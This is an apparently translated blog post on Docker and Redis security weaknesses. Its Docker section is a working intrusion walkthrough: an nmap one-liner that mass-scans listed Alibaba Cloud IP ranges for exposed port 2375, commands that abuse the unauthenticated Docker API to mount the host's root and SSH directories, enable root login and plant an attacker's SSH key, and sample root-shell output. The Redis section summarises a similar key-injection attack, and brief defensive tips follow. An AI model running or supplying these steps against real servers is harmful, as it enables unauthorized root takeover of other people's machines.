Article Directory
foreword
Docker security
Docker security vulnerabilities mainly include the following aspects:
- Docker does not isolate the user namespace. In other words, the root user inside the container is the root user of the host machine. Once the directory is mounted, the mounted file system can be modified at will within the container as the root user of the host machine.
- The docker service has high execution rights, and ordinary users under the docker user group can execute
docker run
commands such as - If the exposed docker remote API port does not enable ssl verification, any machine that can connect to the docker host can freely operate the docker daemon of the docker host.
Here is a case as an illustration, excerpted from: Docker 2375 port intrusion server
- Use
nmap
the command to scan port 2375, the main target is the IP segment of aliyun, you can know it through Baidu
42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China
42.120.0.0/16 Aliyun Computing Co., LTD China
42.121.0.0/16 Aliyun Computing Co., LTD China
42.156.128.0/17 Aliyun Computing Co., LTD China
110.75.0.0/16 Asia Pacific Network Information Centre China
110.76.0.0/19 Ali Technology Co., Ltd China
110.76.32.0/20 Aliyun Computing Co., LTD China
110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China
110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China
112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China
115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China
115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China
119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China
119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China
121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China
121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
140.205.0.0/16 Aliyun Computing Co., LTD China
203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China
218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China
223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China
223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China
223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China
223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.
Save these ip segments as aliyun.list
, execute the following command:
cat aliyun.list| awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open
# 简单解释一下命令:
# awk 将第一列IP网段过滤出来
# xargs 将过滤出来的IP一个一个的分次送给nmap,-I {} 是指使用{}来代替传送的参数
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT STATE SERVICE
# 2375/tcp open docker
# ...
Assume that the IP to be attacked after scanning is: 127.0.0.1
.
- Test the permissions of 2375
docker -H tcp://127.0.0.1:2375 ps
# CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh" 9 days ago Up 3 days 0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2 "rethinkdb --bind all" 9 days ago Up 3 days 8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago Up 3 days 0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine "nginx -g 'daemon off" 3 weeks ago Up 3 days 443/tcp, 0.0.0.0
# ...
The reason for this message is that the port 2375 of the server docker does not enable SSL verification
- Start your own container remotely
# images 看看本地已有的镜像
# docker -H tcp://127.0.0.1:2375 images
# ...
# swarm latest 47dc182ea74b 4 weeks ago 19.32 MB
# jwilder/nginx-proxy latest 203b20631e41 4 weeks ago 255.6 MB
# ubuntu latest c5f1cf30c96b 4 weeks ago 120.8 MB
# shipyard/shipyard latest ba426f0944bc 5 weeks ago 58.92 MB
# ...
Choose a mirror, such as Ubuntu
# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu
- ssh pub key injection
/tmp/ssh_etc/sshd_config
First look at the (that is, the host /etc/ssh/sshd_config
) field in the container that was just started PermitRootLogin
. If it is no, change it to yes to allow root to log in through ssh.
Then generate a new pair of pub keys on your machine (if you already have an ssh key, it is also recommended to generate a new one, do not use your daily ssh pub key)
# 使用 ssh-keygen生成
ssh-keygen -t rsa -C "[email protected]"
# 执行命令后的提示Enter file in which to save the key要看好,不要把自己的ssh key覆盖了,可以选着/tmp/id_rsa
# 其他提示enter到底即可
Go ahead, inject the ssh pub key, go back to the container execution just started
cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA.... # 这里粘贴你刚刚在自己机器生成的/tmp/id_rsa.pub
>EOF
# 如果/tmp/root/.ssh目录不存在,就直接创建
- login server
# ssh -i 指定秘钥登录
ssh -i /tmp/id_rsa [email protected]
# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~#
# ...
- How to put this vulnerability
can refer to: Protect the Docker daemon socket
Redis security
The attack of Redis mainly has the following steps:
- Maliciously scan port 6379, determine that the redis service is included, and try to log in with ssh
- Use the redis client to connect to the redis server and execute redis commands, such as clearing all data
- Use
config dir
the command to backup the redis data path value /root/.ssh/ - Use
config filename
the specified RDB backup file name as authorized_keys - Set the crackit key and set the value to the public key of the malicious visitor
- Execute bgsave, the save action triggers RDB data backup, and stores the attacker’s public key in authorized_keys
- The attacker ssh to the redis server successfully
Generally speaking, the corresponding defensive strategy is as follows:
- Set a password that is complex enough and updated regularly. If it is Redis with a master-slave structure, remember to add the masterauth configuration to the configuration of the slave node, otherwise the synchronization of the master-slave node will fail
- Disguise dangerous commands, such as keys: If there are many keys, there is a possibility of blocking Redis. flushall/flushdb: All data is cleared. save: If there are many key values, there is a possibility of blocking Redis. debug: For example, debug reload will restart Redis. config: config should be handed over to administrators. shutdown: Stop Redis.
- set up firewall
- do not use the default port
- Start redis with a non-root user